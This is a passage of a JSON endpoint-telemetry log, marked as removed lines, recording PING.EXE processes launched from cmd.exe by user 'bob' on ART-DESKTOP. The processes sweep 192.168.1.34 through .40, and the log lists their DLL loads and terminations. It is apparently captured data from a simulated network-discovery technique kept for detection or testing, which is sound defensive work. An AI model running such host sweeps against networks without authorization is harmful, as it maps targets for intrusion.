"PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572146980000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572146980000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572146980000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572146980000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572146980000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572146980000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" - }, - { - "event_type": "process", - "pid": 2216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572151840000, - "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.34", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5508, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572151980000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572151990000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572151990000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572151990000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572151990000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572151990000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572151990000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572151990000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572151990000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572151990000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572151990000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572151990000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" - }, - { - "event_type": "process", - "pid": 5508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572156990000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.35", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2504, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572157140000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 2504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572157140000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572157140000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572157140000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572157140000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572157140000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572157140000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572157140000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572157140000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572157140000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572157140000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572157140000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" - }, - { - "event_type": "process", - "pid": 2504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572161830000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.36", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4592, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572161980000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572161980000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572161980000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572161980000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572161980000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572161980000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572161980000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572161980000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572161980000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572161980000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572161980000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572161980000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" - }, - { - "event_type": "process", - "pid": 4592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572166990000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.37", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3036, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572167150000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572167140000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572167140000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572167140000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572167140000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572167140000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572167140000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572167140000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572167140000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572167140000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572167140000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572167140000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" - }, - { - "event_type": "process", - "pid": 3036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572171830000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.38", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5532, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572171980000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572171980000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572171980000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572171980000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572171980000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572171980000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572171980000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572171980000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572171980000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572171980000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572171980000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572171980000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" - }, - { - "event_type": "process", - "pid": 5532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572176990000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.39", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5512, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572177140000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5512, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572177140000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5512, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572177140000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5512, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572177140000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5512, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572177140000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5512, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572177140000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5512, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572177140000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5512, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572177140000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5512, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572177140000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5512, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572177140000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5512, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572177140000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5512, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572177300000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" - }, - { - "event_type": "process", - "pid": 5512, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572181990000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.40", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5276, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572182140000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182140000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182140000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5276, - "process_name": 